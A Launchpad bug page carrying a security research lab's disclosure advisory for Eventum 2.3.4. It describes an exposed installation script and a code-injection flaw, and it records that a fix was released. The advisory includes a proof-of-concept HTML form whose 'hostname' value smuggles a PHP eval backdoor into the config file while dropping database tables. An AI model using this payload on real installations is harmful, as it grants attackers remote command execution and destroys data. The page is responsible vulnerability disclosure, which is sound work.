Eventum Security Vulnerabilities Notification
Bug #1271499 reported by
htbridge
This bug affects 1 person
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| Eventum |
Fix Released
|
High
|
Elan Ruusamäe | ||
Bug Description
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in Eventum 2.3.4.
Preview available here: https:/
Developers can contact us by email advisory (at) htbridge.com for details.
For any questions related to this notification message - please visit our General Information & Disclosure Policy page: https:/
Best regards,
High-Tech Bridge Security Research Lab
Revision history for this message
| htbridge (advisory) wrote | #1 |
Download full text (3.7 KiB)
Revision history for this message
| Elan Ruusamäe (glen666) wrote | #2 |
Revision history for this message
| Elan Ruusamäe (glen666) wrote | #3 |
| Changed in eventum: | |
| milestone: | none → 2.3.5 |
| status: | New → Fix Released |
| assignee: | nobody → Elan Ruusamäe (glen666) |
| importance: | Undecided → High |
Revision history for this message
| Bryan Alsdorf (balsdorf) wrote | #4 |
Revision history for this message
| htbridge (advisory) wrote | #5 |
| information type: | Private Security → Public Security |
Revision history for this message
| Elan Ruusamäe (glen666) wrote | #6 |
To post a comment you must log in.
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.
Detailed description and all available details of the vulnerabilities is provided below in the email.
Please notify us by replying to this email when you release a security update, and provide us if possible with URL of patch/solution so we can add this URL to the advisory.
If you need more time to fix the vulnerabilities - please specify desired Public Disclosure date by replying to this email.
For any questions related to this notification email - please visit our General Information & Disclosure Policy page: https:/
If you don't find an answer to your question there - please feel free to contact us by email: <email address hidden>
=======
Advisory ID: HTB23198
Reference: https:/
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:
Discovered and Provided: High-Tech Bridge Security Research Lab ( https:/
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.
1) Incorrect Default Permissions in Eventum
The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
The installation script can be access by a remote unauthenticated user via the following URL:
http://[host]/
2) Code Injection in Eventum
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/
The following exploitation example injects a backdoor into "/config/
<form action="http://[host]/
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="
<input type="hidden" name="se...